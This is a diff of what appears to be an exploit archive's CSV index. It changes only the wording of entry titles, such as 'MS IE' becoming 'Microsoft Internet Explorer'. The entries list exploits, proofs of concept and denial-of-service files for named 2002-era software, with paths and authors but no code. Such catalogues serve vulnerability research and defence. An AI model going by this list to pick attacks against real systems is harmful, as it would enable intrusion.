Vulnerability",2002-02-19,"Thomas Springer",multiple,remote,0 @@ -18557,7 +18557,7 @@ id,file,description,date,author,platform,type,port 21304,platforms/php/webapps/21304.txt,"Ikonboard 2.17/3.0/3.1 Image Tag Cross-Agent Scripting Vulnerability",2002-02-26,godminus,php,webapps,0 21305,platforms/windows/remote/21305.c,"Galacticomm Worldgroup 3.20 Remote FTP Denial of Service Vulnerability",2002-02-27,"Limpid Byte",windows,remote,0 21306,platforms/windows/remote/21306.c,"Galacticomm Worldgroup 3.20 Remote Web Server Denial of Service Vulnerability",2002-02-27,"Limpid Byte",windows,remote,0 -21307,platforms/windows/remote/21307.txt,"Rit Research Labs The Bat! 1.53 MS DoS Device Name Denial of Service Vulnerability",2002-02-27,3APA3A,windows,remote,0 +21307,platforms/windows/remote/21307.txt,"Rit Research Labs The Bat! 1.53 Microsoft DoS Device Name Denial of Service Vulnerability",2002-02-27,3APA3A,windows,remote,0 21308,platforms/asp/webapps/21308.txt,"Snitz Forums 2000 3.0/3.1/3.3 Image Tag Cross-Agent Scripting Vulnerability",2002-02-27,Justin,asp,webapps,0 21309,platforms/linux/remote/21309.c,"xtell 1.91.1/2.6.1 - Multiple Remote Buffer Overflow Vulnerabilities",2002-02-27,spybreak,linux,remote,0 21310,platforms/linux/remote/21310.txt,"xtell 2.6.1 User Status Remote Information Disclosure Vulnerability",2002-02-27,spybreak,linux,remote,0 @@ -18580,7 +18580,7 @@ id,file,description,date,author,platform,type,port 21333,platforms/windows/dos/21333.txt,"AOL Instant Messenger 4.x Hyperlink Denial of Service Vulnerability",2002-03-01,"NtWaK0 & Recon",windows,dos,0 21334,platforms/php/remote/21334.pl,"Cobalt RaQ 2.0/3.0/4.0 XTR MultiFileUpload.php Authentication Bypass Vulnerability (1)",2002-03-08,"Wouter ter Maat",php,remote,0 21335,platforms/php/remote/21335.sh,"Cobalt RaQ 2.0/3.0/4.0 XTR MultiFileUpload.php Authentication Bypass Vulnerability (2)",2002-03-08,"Wouter ter Maat",php,remote,0 -21336,platforms/windows/dos/21336.txt,"Xerver 2.10 Multiple Request Denial of Service Vulnerability",2002-03-08,"Alex Hernandez",windows,dos,0 +21336,platforms/windows/dos/21336.txt,"Xerver 2.10 - Multiple Request Denial of Service Vulnerability",2002-03-08,"Alex Hernandez",windows,dos,0 21337,platforms/multiple/dos/21337.c,"Menasoft SPHEREserver 0.99 Denial of Service Vulnerability",2002-03-09,"H Zero Seven",multiple,dos,0 21338,platforms/linux/dos/21338.pl,"XTux Server 2001.0 6.01 Garbage Denial of Service Vulnerability",2002-03-09,b0iler,linux,dos,0 21339,platforms/multiple/remote/21339.c,"Trend Micro InterScan VirusWall 3.5/3.6 Content-Length Scan Bypass Vulnerability",2002-03-11,"Jochen Thomas Bauer",multiple,remote,0 @@ -18589,8 +18589,8 @@ id,file,description,date,author,platform,type,port 21342,platforms/linux/local/21342.c,"Ecartis 1.0 .0,0.129 a Listar Multiple Local Buffer Overflow Vulnerabilities (2)",2002-02-27,"the itch",linux,local,0 21343,platforms/php/webapps/21343.txt,"PHProjekt 3.1 - Remote File Include Vulnerability",2002-03-13,b0iler,php,webapps,0 21344,platforms/windows/local/21344.txt,"Microsoft Windows 2000 / NT 4.0 Process Handle Local Privilege Elevation Vulnerability",2002-03-13,EliCZ,windows,local,0 -21345,platforms/unix/dos/21345.txt,"Qualcomm QPopper 4.0.x Remote Denial of Service Vulnerability",2002-03-15,"Jonas Frey",unix,dos,0 -21346,platforms/windows/dos/21346.html,"MS IE 5/6,Mozilla 0.8/0.9.x,Opera 5/6 JavaScript Interpreter Denial of Service Vulnerability",2002-03-19,"Patrik Birgersson",windows,dos,0 +21345,platforms/unix/dos/21345.txt,"Qualcomm QPopper 4.0.x - Remote Denial of Service Vulnerability",2002-03-15,"Jonas Frey",unix,dos,0 +21346,platforms/windows/dos/21346.html,"Microsoft Internet Explorer 5/6,Mozilla 0.8/0.9.x,Opera 5/6 JavaScript Interpreter Denial of Service Vulnerability",2002-03-19,"Patrik Birgersson",windows,dos,0 21347,platforms/php/local/21347.php,"PHP 3.0.x/4.x Move_Uploaded_File Open_Basedir Circumvention Vulnerability",2002-03-17,Tozz,php,local,0 21348,platforms/linux/local/21348.txt,"Webmin 0.x Script Code Input Validation Vulnerability",2002-03-20,prophecy,linux,local,0 21349,platforms/php/webapps/21349.txt,"PHP Nuke 5.x Error Message Web Root Disclosure Vulnerability",2002-03-21,godminus,php,webapps,0 @@ -18610,7 +18610,7 @@ id,file,description,date,author,platform,type,port 21363,platforms/unix/remote/21363.c,"Icecast 1.x AVLLib Buffer Overflow Vulnerability",2002-02-16,dizznutt,unix,remote,0 21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x TalkD User Validation Vulnerability",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0 21365,platforms/linux/remote/21365.txt,"PHPGroupWare 0.9.13 Debian Package Configuration Vulnerability",2002-04-03,"Matthias Jordan",linux,remote,0 -21366,platforms/windows/dos/21366.txt,"MS IE 5/6,Outlook 2000/2002/5.5,Word 2000/2002 VBScript ActiveX Word Object DoS Vulnerability",2002-04-08,"Elia Florio",windows,dos,0 +21366,platforms/windows/dos/21366.txt,"Microsoft Internet Explorer 5/6,Outlook 2000/2002/5.5,Word 2000/2002 VBScript ActiveX Word Object DoS Vulnerability",2002-04-08,"Elia Florio",windows,dos,0 21367,platforms/windows/remote/21367.txt,"Abyss Web Server 1.0 File Disclosure Vulnerability",2002-04-07,"Jeremy Roberts",windows,remote,0 21368,platforms/windows/remote/21368.c,"Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (1)",2002-04-10,"CHINANSL Security Team",windows,remote,0 21369,platforms/windows/remote/21369.c,"Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow Vulnerability (2)",2002-04-14,hsj,windows,remote,0 @@ -18619,7 +18619,7 @@ id,file,description,date,author,platform,type,port 21372,platforms/windows/remote/21372.txt,"Microsoft IIS 4/5 HTTP Error Page Cross Site Scripting Vulnerability",2002-04-10,"Thor Larholm",windows,remote,0 21373,platforms/openbsd/local/21373.c,"OpenBSD 2.9/3.0 Default Crontab root Compromise Vulnerability",2002-04-11,"Przemyslaw Frasunek",openbsd,local,0 21374,platforms/cgi/webapps/21374.txt,"IBM Informix Web Datablade 4.1x Page Request SQL Injection Vulnerability",2002-04-11,"Simon Lodal",cgi,webapps,0 -21375,platforms/linux/local/21375.txt,"ISC INN 2.0/2.1/2.2.x Multiple Local Format String Vulnerabilties",2002-04-11,"Paul Starzetz",linux,local,0 +21375,platforms/linux/local/21375.txt,"ISC INN 2.0/2.1/2.2.x - Multiple Local Format String Vulnerabilties",2002-04-11,"Paul Starzetz",linux,local,0 21376,platforms/windows/remote/21376.html,"Microsoft Internet Explorer 5.5/6.0 History List Script Injection Vulnerability",2002-04-15,"Andreas Sandblad",windows,remote,0 21377,platforms/php/webapps/21377.txt,"SunShop Shopping Cart 1.5/2.x User-Embedded Scripting Vulnerability",2002-04-13,ppp-design,php,webapps,0 21378,platforms/hardware/remote/21378.txt,"Nortel CVX 1800 Multi-Service Access Switch Default SNMP Community Vulnerability",2002-04-15,"Michael Rawls",hardware,remote,0 @@ -18636,7 +18636,7 @@ id,file,description,date,author,platform,type,port 21389,platforms/windows/dos/21389.txt,"Microsoft Windows 2000 Lanman Denial of Service Vulnerability (2)",2003-01-03,ch0wn,windows,dos,0 21390,platforms/cgi/remote/21390.txt,"Sambar Server 5.1 Script Source Disclosure Vulnerability",2002-04-17,pgrundl,cgi,remote,0 21391,platforms/php/webapps/21391.txt,"PVote 1.0/1.5 Poll Content Manipulation Vulnerability",2002-04-18,"Daniel Nyström",php,webapps,0 -21392,platforms/windows/webapps/21392.txt,"Spiceworks 6.0.00993 Multiple Script Injection Vulnerabilities",2012-09-19,LiquidWorm,windows,webapps,0 +21392,platforms/windows/webapps/21392.txt,"Spiceworks 6.0.00993 - Multiple Script Injection Vulnerabilities",2012-09-19,LiquidWorm,windows,webapps,0 21393,platforms/php/webapps/21393.txt,"wordpress wp-topbar 4.02 - Multiple Vulnerabilities",2012-09-19,"Blake Entrekin",php,webapps,0 21394,platforms/windows/webapps/21394.txt,"sonicwall email security 7.3.5 - Multiple Vulnerabilities",2012-09-19,Vulnerability-Lab,windows,webapps,0 21395,platforms/hardware/webapps/21395.txt,"Fortigate UTM WAF Appliance Multiple Vulnerabilities",2012-09-19,Vulnerability-Lab,hardware,webapps,0 @@ -18675,7 +18675,7 @@ id,file,description,date,author,platform,type,port 21428,platforms/php/webapps/21428.txt,"Messagerie 1.0 Arbitrary User Removal DoS Vulnerability",2002-04-27,frog,php,webapps,0 21429,platforms/windows/dos/21429.c,"3CDaemon 2.0 - Buffer Overflow Vulnerability (1)",2002-04-15,"MaD SKiLL",windows,dos,0 21431,platforms/irix/dos/21431.txt,"IRIX 6.5.x Performance Co-Pilot Remote Denial of Service Vulnerability",2002-04-12,"Marcelo Magnasco",irix,dos,0 -21432,platforms/windows/dos/21432.txt,"BEA Systems WebLogic Server and Express 7.0 Null Character DoS",2002-04-30,"Peter Gründl",windows,dos,0 +21432,platforms/windows/dos/21432.txt,"BEA Systems WebLogic Server and Express 7.0 - Null Character DoS",2002-04-30,"Peter Gründl",windows,dos,0 21433,platforms/cgi/webapps/21433.txt,"MyGuestbook 1.0 Script Injection Vulnerability",2002-04-30,BrainRawt,cgi,webapps,0 21434,platforms/asp/webapps/21434.txt,"Outfront Spooky 2.x Login SQL Query Manipulation Password Vulnerability",2002-05-02,anonymous,asp,webapps,0 21435,platforms/cgi/webapps/21435.txt,"askSam 4.0 Web Publisher Cross Site Scripting Vulnerability",2002-05-05,frog,cgi,webapps,0 @@ -18693,7 +18693,7 @@ id,file,description,date,author,platform,type,port 21447,platforms/php/webapps/21447.txt,"XMB Forum 1.6 Magic Lantern Cross Site Scripting Vulnerabilities",2002-05-11,frog,php,webapps,0 21448,platforms/php/webapps/21448.txt,"XMB Forum 1.6 Magic Lantern Log File Vulnerabilities",2002-05-11,frog,php,webapps,0 21449,platforms/php/webapps/21449.txt,"NOCC 0.9.x Webmail Script Injection Vulnerability",2002-05-14,ppp-design,php,webapps,0 -21450,platforms/multiple/remote/21450.txt,"id Software Quake II Server 3.20/3.21 Remote Information Disclosure Vulnerability",2002-05-15,Redix,multiple,remote,0 +21450,platforms/multiple/remote/21450.txt,"id Software Quake II Server 3.20/3.21 - Remote Information Disclosure Vulnerability",2002-05-15,Redix,multiple,remote,0 21451,platforms/windows/remote/21451.txt,"Opera 5.12/6.0 Frame Location Same Origin Policy Circumvention Vulnerability",2002-05-15,"Andreas Sandblad",windows,remote,0 21452,platforms/windows/remote/21452.txt,"Microsoft Internet Explorer 5.0.1/6.0 Content-Disposition Handling File Execution Vulnerability",2002-05-15,"Jani Laatikainen",windows,remote,0 21453,platforms/multiple/remote/21453.txt,"SonicWall SOHO3 6.3 Content Blocking Script Injection Vulnerability",2002-05-17,"E M",multiple,remote,0 @@ -18750,17 +18750,17 @@ id,file,description,date,author,platform,type,port 21504,platforms/linux/local/21504.sh,"QNX RTOS 4.25/6.1 phgrafx-startup Privilege Escalation Vulnerability",2002-06-03,badc0ded,linux,local,0 21505,platforms/linux/local/21505.c,"QNX RTOS 6.1 phlocale Environment Variable Buffer Overflow Vulnerability",2002-06-03,badc0ded,linux,local,0 21506,platforms/linux/local/21506.c,"QNX RTOS 6.1 PKG-Installer Buffer Overflow Vulnerability",2002-06-03,badc0ded,linux,local,0 -21507,platforms/linux/local/21507.sh,"QNX 6.x 'ptrace()' Arbitrary Process Modification Vulnerability",2002-06-03,badc0ded,linux,local,0 +21507,platforms/linux/local/21507.sh,"QNX 6.x - 'ptrace()' Arbitrary Process Modification Vulnerability",2002-06-03,badc0ded,linux,local,0 21508,platforms/windows/dos/21508.py,"SafeNet Sentinel Keys Server Crash PoC",2012-09-24,retset,windows,dos,0 21509,platforms/php/webapps/21509.txt,"Teekai Tracking Online 1.0 Cross-Site Scripting Vulnerability",2002-06-03,frog,php,webapps,0 -21510,platforms/windows/remote/21510.pl,"MS IE 5/6,MS ISA Server 2000,MS Proxy Server 2.0 Gopher Client Buffer Overflow",2002-07-27,mat@monkey.org,windows,remote,0 +21510,platforms/windows/remote/21510.pl,"Microsoft Internet Explorer 5/6, Microsoft ISA Server 2000, Microsoft Proxy Server 2.0 Gopher Client - Buffer Overflow",2002-07-27,mat@monkey.org,windows,remote,0 21511,platforms/multiple/remote/21511.c,"Nullsoft SHOUTCast 1.8.9 - Remote Buffer Overflow Vulnerability",2002-06-04,eSDee,multiple,remote,0 21512,platforms/freebsd/dos/21512.txt,"Slurp 1.10 SysLog Remote Format String Vulnerability",2002-06-04,zillion,freebsd,dos,0 21513,platforms/hardware/remote/21513.c,"Telindus 1100 Series Router Administration Password Leak Vulnerability",2002-06-05,rubik,hardware,remote,0 21514,platforms/php/webapps/21514.txt,"Splatt Forum 3.0 Image Tag HTML Injection Vulneraility",2002-06-06,MegaHz,php,webapps,0 -21515,platforms/windows/remote/21515.txt,"MS IE 5/6 FTP Web View Cross Site Scripting Vulnerability",2002-06-06,"Eiji James Yoshida",windows,remote,0 +21515,platforms/windows/remote/21515.txt,"Microsoft Internet Explorer 5/6 FTP Web View Cross Site Scripting Vulnerability",2002-06-06,"Eiji James Yoshida",windows,remote,0 21516,platforms/unix/local/21516.pl,"Ehud Gavron TrACESroute 6.1.1 Terminator Function Format String",2002-06-06,stringz,unix,local,0 -21517,platforms/php/webapps/21517.txt,"Voxel Dot Net CBMS 0.x Multiple Code Injection Vulnerabilities",2002-06-06,"Ulf Harnhammar",php,webapps,0 +21517,platforms/php/webapps/21517.txt,"Voxel Dot Net CBms 0.x - Multiple Code Injection Vulnerabilities",2002-06-06,"Ulf Harnhammar",php,webapps,0 21518,platforms/linux/dos/21518.txt,"X Window 4.0/4.1/4.2 System Oversized Font DoS",2002-06-10,"Tom Vogt",linux,dos,0 21519,platforms/php/webapps/21519.txt,"MyHelpDesk 20020509 HTML Injection Vulnerability",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21520,platforms/linux/remote/21520.py,"QNX <= 6.5.0 / QCONN <= 1.4.207944 - Remote Command Execution Vulnerability",2012-09-25,Mor!p3r,linux,remote,0 @@ -18771,7 +18771,7 @@ id,file,description,date,author,platform,type,port 21526,platforms/php/webapps/21526.txt,"MyHelpDesk 20020509 Cross-Site Scripting Vulnerability",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21527,platforms/php/webapps/21527.txt,"MyHelpDesk 20020509 SQL Injection Vulnerability",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21528,platforms/php/webapps/21528.txt,"Geeklog 1.3.5 Calendar Event Form Script Injection Vulnerability",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 -21529,platforms/php/webapps/21529.txt,"W-Agora 4.1.x Remote File Include Vulnerability",2002-06-10,frog,php,webapps,0 +21529,platforms/php/webapps/21529.txt,"W-Agora 4.1.x - Remote File Include Vulnerability",2002-06-10,frog,php,webapps,0 21530,platforms/windows/remote/21530.txt,"Seanox DevWex Windows Binary 1.2002.520 File Disclosure",2002-06-08,"Kistler Ueli",windows,remote,0 21531,platforms/unix/dos/21531.txt,"Caldera OpenServer 5.0.x XSCO Color Database File Heap Overflow Vulnerability",2002-06-11,kf,unix,dos,0 21532,platforms/cgi/webapps/21532.txt,"CGIScript.net csNews 1.0 Double URL Encoding Unauthorized Administrative Access",2002-06-11,"Steve Gustin",cgi,webapps,0 @@ -18811,7 +18811,7 @@ id,file,description,date,author,platform,type,port 21566,platforms/unix/local/21566.c,"Interbase 6.0 GDS_Drop Interbase Environment Variable Buffer Overflow (2)",2002-06-18,bob,unix,local,0 21567,platforms/cgi/webapps/21567.pl,"WebScripts WebBBS 4.x/5.0 - Remote Command Execution Vulnerability",2002-06-06,"NERF Security",cgi,webapps,0 21568,platforms/linux/local/21568.c,"Cisco VPN Client for Unix 3.5.1 - Local Buffer Overflow Vulnerability",2002-06-19,methodic,linux,local,0 -21569,platforms/windows/dos/21569.txt,"MS SQL Server 2000,MS Jet 4.0 Engine Unicode Buffer Overflow Vulnerability",2002-06-19,NGSSoftware,windows,dos,0 +21569,platforms/windows/dos/21569.txt,"Microsoft SQL Server 2000,Microsoft Jet 4.0 Engine Unicode Buffer Overflow Vulnerability",2002-06-19,NGSSoftware,windows,dos,0 21570,platforms/php/webapps/21570.txt,"BasiliX Webmail 1.1 Message Content Script Injection Vulnerability",2002-06-19,"Ulf Harnhammar",php,webapps,0 21571,platforms/irix/remote/21571.c,"SGI IRIX 6.x rpc.xfsmd Remote Command Execution Vulnerability",2002-06-20,"Last Stage of Delirium",irix,remote,0 21572,platforms/multiple/dos/21572.txt,"Half-Life Server 1.1/3.1 New Player Flood Denial of Service Vulnerability",2002-06-20,"Auriemma Luigi",multiple,dos,0 @@ -18844,17 +18844,17 @@ id,file,description,date,author,platform,type,port 21599,platforms/windows/remote/21599.txt,"Working Resources BadBlue 1.7.3 cleanSearchString() Cross Site Scripting Vulnerability",2002-07-08,"Matthew Murphy",windows,remote,0 21600,platforms/windows/dos/21600.txt,"Working Resources BadBlue 1.7.3 Get Request Denial of Service Vulnerability",2002-07-08,"Matthew Murphy",windows,dos,0 21601,platforms/windows/remote/21601.c,"Microsoft Foundation Class Library 7.0 ISAPI Buffer Overflow Vulnerability",2002-07-08,"Matthew Murphy",windows,remote,0 -21602,platforms/linux/remote/21602.txt,"icecast server 1.3.12 - Directory Traversal information disclosure vulnerability",2002-07-09,glaive,linux,remote,0 +21602,platforms/linux/remote/21602.txt,"icecast server 1.3.12 - Directory Traversal information disclosure Vulnerability",2002-07-09,glaive,linux,remote,0 21603,platforms/multiple/remote/21603.txt,"iPlanet Web Server 4.1 Search Component File Disclosure Vulnerability",2002-07-09,"Qualys Corporation",multiple,remote,0 21604,platforms/linux/remote/21604.txt,"Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability",2002-07-10,"Matt Moore",linux,remote,0 21605,platforms/windows/remote/21605.txt,"Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability",2002-07-10,"Matt Moore",windows,remote,0 -21606,platforms/windows/remote/21606.txt,"MS IE 5/6 OBJECT Tag Same Origin Policy Violation Vulnerability",2002-07-10,"Thor Larholm",windows,remote,0 +21606,platforms/windows/remote/21606.txt,"Microsoft Internet Explorer 5/6 OBJECT Tag Same Origin Policy Violation Vulnerability",2002-07-10,"Thor Larholm",windows,remote,0 21607,platforms/windows/remote/21607.txt,"GoAhead WebServer 2.1.x URL Encoded Slash Directory Traversal Vulnerability",2002-07-10,"Matt Moore",windows,remote,0 21608,platforms/windows/remote/21608.txt,"GoAhead WebServer 2.1.x Error Page Cross Site Scripting Vulnerability",2002-07-10,"Matt Moore",windows,remote,0 21609,platforms/cgi/webapps/21609.txt,"Fluid Dynamics Search Engine 2.0 Cross Site Scripting Vulnerability",2002-07-10,VALDEUX,cgi,webapps,0 21610,platforms/php/webapps/21610.txt,"Sun i-Runbook 2.5.2 Directory And File Content Disclosure Vulnerability",2002-07-11,JWC,php,webapps,0 21611,platforms/windows/remote/21611.txt,"Summit Computer Networks Lil' HTTP Server 2.1/2.2 pbcgi.cgi Cross Site Scripting",2002-07-11,"Matthew Murphy",windows,remote,0 -21612,platforms/windows/dos/21612.txt,"Ultrafunk Popcorn 1.20 Multiple Denial of Service Vulnerabilities",2002-07-11,"Auriemma Luigi",windows,dos,0 +21612,platforms/windows/dos/21612.txt,"Ultrafunk Popcorn 1.20 - Multiple Denial of Service Vulnerabilities",2002-07-11,"Auriemma Luigi",windows,dos,0 21613,platforms/windows/remote/21613.txt,"Microsoft IIS 4/5 SMTP Service Encapsulated SMTP Address Vulnerability",2002-07-12,JWC,windows,remote,0 21614,platforms/freebsd/remote/21614.c,"ATPhttpd 0.4 b Buffer Overflow Vulnerabilities",2002-07-12,badc0ded,freebsd,remote,0 21615,platforms/windows/remote/21615.c,"Real Networks RealJukebox 1.0.2/RealOne 6.0.10 Player Gold Skinfile Buffer Overflow",2002-07-12,UNYUN,windows,remote,0 @@ -18878,7 +18878,7 @@ id,file,description,date,author,platform,type,port 21633,platforms/windows/remote/21633.c,"SmartMax MailMax 4.8 Popmax Buffer Overflow Vulnerability",2002-07-20,anonymous,windows,remote,0 21634,platforms/windows/dos/21634.c,"SecureCRT 2.4/3.x/4.0 SSH1 Identifier String Buffer Overflow Vulnerability (1)",2002-07-23,Kyuzo,windows,dos,0 21635,platforms/windows/remote/21635.c,"SecureCRT 2.4/3.x/4.0 SSH1 Identifier String Buffer Overflow Vulnerability (2)",2002-07-23,"andrea lisci",windows,remote,0 -21636,platforms/windows/remote/21636.txt,"Opera 6.0.1,MS IE 5/6 JavaScript Modifier Keypress Event Subversion Vulnerability",2002-07-23,"Andreas Sandblad",windows,remote,0 +21636,platforms/windows/remote/21636.txt,"Opera 6.0.1,ms Internet Explorer 5/6 JavaScript Modifier Keypress Event Subversion Vulnerability",2002-07-23,"Andreas Sandblad",windows,remote,0 21637,platforms/hardware/dos/21637.c,"Zyxel Prestige 642R Router Malformed IP Packet Denial of Service Vulnerability",2002-07-24,"Jeff w. Roberson",hardware,dos,0 21638,platforms/multiple/remote/21638.txt,"Mozilla 0.9.x/1.0 JavaScript URL Host Spoofing Arbitrary Cookie Access Vulnerability",2002-07-24,"Andreas Sandblad",multiple,remote,0 21639,platforms/windows/remote/21639.c,"VMWare GSX Server 2.0 Authentication Server Buffer Overflow Vulnerability",2002-07-24,"Zag & Glcs",windows,remote,0 @@ -18916,7 +18916,7 @@ id,file,description,date,author,platform,type,port 21673,platforms/windows/dos/21673.txt,"IPSwitch IMail 6.x/7.0.x Web Calendaring Incomplete Post Denial of Service Vulnerability",2002-07-30,anonymous,windows,dos,0 21674,platforms/linux/local/21674.c,"William Deich Super 3.x SysLog Format String Vulnerability",2002-07-31,gobbles,linux,local,0 21675,platforms/windows/remote/21675.pl,"Trillian 0.x IRC Module Buffer Overflow Vulnerability",2002-07-31,"John C. Hennessy",windows,remote,0 -21676,platforms/php/webapps/21676.txt,"Bharat Mediratta Gallery 1.x Remote File Include Vulnerability",2002-08-01,PowerTech,php,webapps,0 +21676,platforms/php/webapps/21676.txt,"Bharat Mediratta Gallery 1.x - Remote File Include Vulnerability",2002-08-01,PowerTech,php,webapps,0 21677,platforms/solaris/remote/21677.txt,"Sun AnswerBook2 1.x Unauthorized Administrative Script Access Vulnerability",2002-08-02,ghandi,solaris,remote,0 21678,platforms/solaris/remote/21678.c,"Inso DynaWeb httpd 3.1/4.0.2/4.1 Format String Vulnerability",2002-08-02,ghandi,solaris,remote,0 21679,platforms/cgi/webapps/21679.txt,"Dispair 0.1/0.2 - Remote Command Execution Vulnerability",2002-07-30,anonymous,cgi,webapps,0 @@ -18932,7 +18932,7 @@ id,file,description,date,author,platform,type,port 21689,platforms/windows/local/21689.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (6)",2002-08-06,"Brett Moore",windows,local,0 21690,platforms/windows/local/21690.txt,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (7)",2002-08-06,"Ovidio Mallo",windows,local,0 21691,platforms/windows/local/21691.txt,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (8)",2002-08-06,anonymous,windows,local,0 -21692,platforms/windows/remote/21692.txt,"MS IE 5/6,Konqueror 2.2.2/3.0,Weblogic Server 5/6/7 Invalid X.509 Certificate Chain",2002-08-06,"Mike Benham",windows,remote,0 +21692,platforms/windows/remote/21692.txt,"Microsoft Internet Explorer 5/6,Konqueror 2.2.2/3.0,Weblogic Server 5/6/7 Invalid X.509 Certificate Chain",2002-08-06,"Mike Benham",windows,remote,0 21693,platforms/windows/remote/21693.nasl,"Microsoft SQL Server 2000 User Authentication Remote Buffer Overflow Vulnerability",2002-08-06,"Dave Aitel",windows,remote,0 21694,platforms/windows/remote/21694.pl,"602Pro LAN SUITE 2002 Telnet Proxy Localhost Denial of Service Vulnerability",2002-08-03,"Stan Bubrouski",windows,remote,0 21695,platforms/windows/remote/21695.pl,"Qualcomm Eudora 5/6 File Attachment Spoofing Vulnerability (1)",2002-08-08,"Paul Szabo",windows,remote,0 @@ -18986,7 +18986,7 @@ id,file,description,date,author,platform,type,port 21745,platforms/php/webapps/21745.txt,"Achievo 0.7/0.8/0.9 - Remote File Include Command Execution Vulnerability",2002-08-22,"Jeroen Latour",php,webapps,0 21746,platforms/windows/dos/21746.c,"Microsoft Windows 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",windows,dos,0 21747,platforms/windows/dos/21747.txt,"Microsoft Windows 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (2)",2002-08-22,zamolx3,windows,dos,0 -21748,platforms/windows/remote/21748.txt,"MS IE 5/6 Legacy Text Formatting ActiveX Component Buffer Overflow",2002-08-22,"Mark Litchfield",windows,remote,0 +21748,platforms/windows/remote/21748.txt,"Microsoft Internet Explorer 5/6 Legacy Text Formatting ActiveX Component Buffer Overflow",2002-08-22,"Mark Litchfield",windows,remote,0 21749,platforms/windows/remote/21749.txt,"Microsoft Internet Explorer 5/6 XML Redirect File Disclosure Vulnerability",2002-08-23,"GreyMagic Software",windows,remote,0 21750,platforms/windows/remote/21750.txt,"Microsoft Internet Explorer 5 Dialog Same Origin Policy Bypass Variant Vulnerability",2002-04-16,"GreyMagic Software",windows,remote,0 21751,platforms/multiple/remote/21751.txt,"Blazix 1.2 Special Character Handling Server Side Script Information Disclosure",2002-08-24,"Auriemma Luigi",multiple,remote,0 @@ -19002,7 +19002,7 @@ id,file,description,date,author,platform,type,port 21761,platforms/linux/local/21761.c,"Linuxconf 1.1.x / 1.2.x - Local Environment Variable Buffer Overflow Vulnerability (1)",2002-08-28,RaiSe,linux,local,0 21762,platforms/linux/local/21762.c,"Linuxconf 1.1.x / 1.2.x - Local Environment Variable Buffer Overflow Vulnerability (2)",2002-08-28,"David Endler",linux,local,0 21763,platforms/linux/local/21763.txt,"Linuxconf 1.1.x / 1.2.x - Local Environment Variable Buffer Overflow Vulnerability (3)",2002-08-28,syscalls,linux,local,0 -21764,platforms/windows/remote/21764.txt,"MS Word 95/97/98/2000/2002 Excel 2002 INCLUDETEXT Document Sharing File Disclosure",2002-08-26,"Alex Gantman",windows,remote,0 +21764,platforms/windows/remote/21764.txt,"Microsoft Word 95/97/98/2000/2002 Excel 2002 INCLUDETEXT Document Sharing File Disclosure",2002-08-26,"Alex Gantman",windows,remote,0 21765,platforms/linux/remote/21765.pl,"Webmin 0.x RPC Function Privilege Escalation Vulnerability",2002-08-28,"Noam Rathaus",linux,remote,0 21766,platforms/asp/webapps/21766.txt,"FactoSystem Weblog 0.9/1.0/1.1 - Multiple SQL Injection Vulnerabilities",2002-08-31,"Matthew Murphy",asp,webapps,0 21767,platforms/multiple/remote/21767.txt,"NullLogic Null HTTPd 0.5 Error Page Cross-Site Scripting Vulnerability",2002-09-02,"Matthew Murphy",multiple,remote,0 @@ -19015,7 +19015,7 @@ id,file,description,date,author,platform,type,port 21774,platforms/unix/local/21774.pl,"HP Tru64 4.0/5.0/5.1 _XKB_CHARSET Local Buffer Overflow Vulnerability",2002-07-10,stripey,unix,local,0 21775,platforms/linux/dos/21775.c,"SWS Simple Web Server 0.0.3/0.0.4/0.1 New Line Denial of Service Vulnerability",2002-09-02,saman,linux,dos,0 21776,platforms/php/webapps/21776.txt,"PHP 4.2.3 Header Function Script Injection Vulnerability",2002-09-07,"Matthew Murphy",php,webapps,0 -21777,platforms/windows/remote/21777.txt,"MS IE 5 IFrame/Frame Cross-Site/Zone Script Execution Vulnerability",2002-09-09,"GreyMagic Software",windows,remote,0 +21777,platforms/windows/remote/21777.txt,"Microsoft Internet Explorer 5 IFrame/Frame Cross-Site/Zone Script Execution Vulnerability",2002-09-09,"GreyMagic Software",windows,remote,0 21778,platforms/php/webapps/21778.txt,"phpGB 1.x SQL Injection Vulnerability",2002-09-09,ppp-design,php,webapps,0 21779,platforms/php/webapps/21779.txt,"WoltLab Burning Board 2.0 - SQL Injection Vulnerability",2002-09-09,Cano2,php,webapps,0 21780,platforms/php/webapps/21780.txt,"phpGB 1.1 HTML Injection Vulnerability",2002-09-09,ppp-design,php,webapps,0 @@ -19046,11 +19046,11 @@ id,file,description,date,author,platform,type,port 21805,platforms/unix/local/21805.c,"Cisco VPN 5000 Client Buffer Overrun Vulnerabilities (1)",2002-09-18,BrainStorm,unix,local,0 21806,platforms/unix/local/21806.c,"Cisco VPN 5000 Client Buffer Overrun Vulnerabilities (2)",2002-09-18,zillion,unix,local,0 21807,platforms/unix/local/21807.pl,"HP Tru64/OSF1 DXTerm Buffer Overflow Vulnerability",2002-07-03,stripey,unix,local,0 -21808,platforms/windows/remote/21808.txt,"MS VM 2000/3000/3100/3188/3200/3300/3802/3805 series JDBC Class Code Execution",2002-09-19,anonymous,windows,remote,0 +21808,platforms/windows/remote/21808.txt,"Microsoft VM 2000/3000/3100/3188/3200/3300/3802/3805 series JDBC Class Code Execution",2002-09-19,anonymous,windows,remote,0 21809,platforms/php/webapps/21809.txt,"Web Help Desk by SolarWinds - Stored XSS",2012-10-08,loneferret,php,webapps,0 21810,platforms/windows/remote/21810.c,"Trillian 0.73/0.74 IRC PRIVMSG Buffer Overflow Vulnerability",2002-09-19,"Lance Fitz-Herbert",windows,remote,0 21811,platforms/php/webapps/21811.txt,"SquirrelMail 1.2.6/1.2.7 - Multiple Cross Site Scripting Vulnerablities",2002-09-19,"DarC KonQuest",php,webapps,0 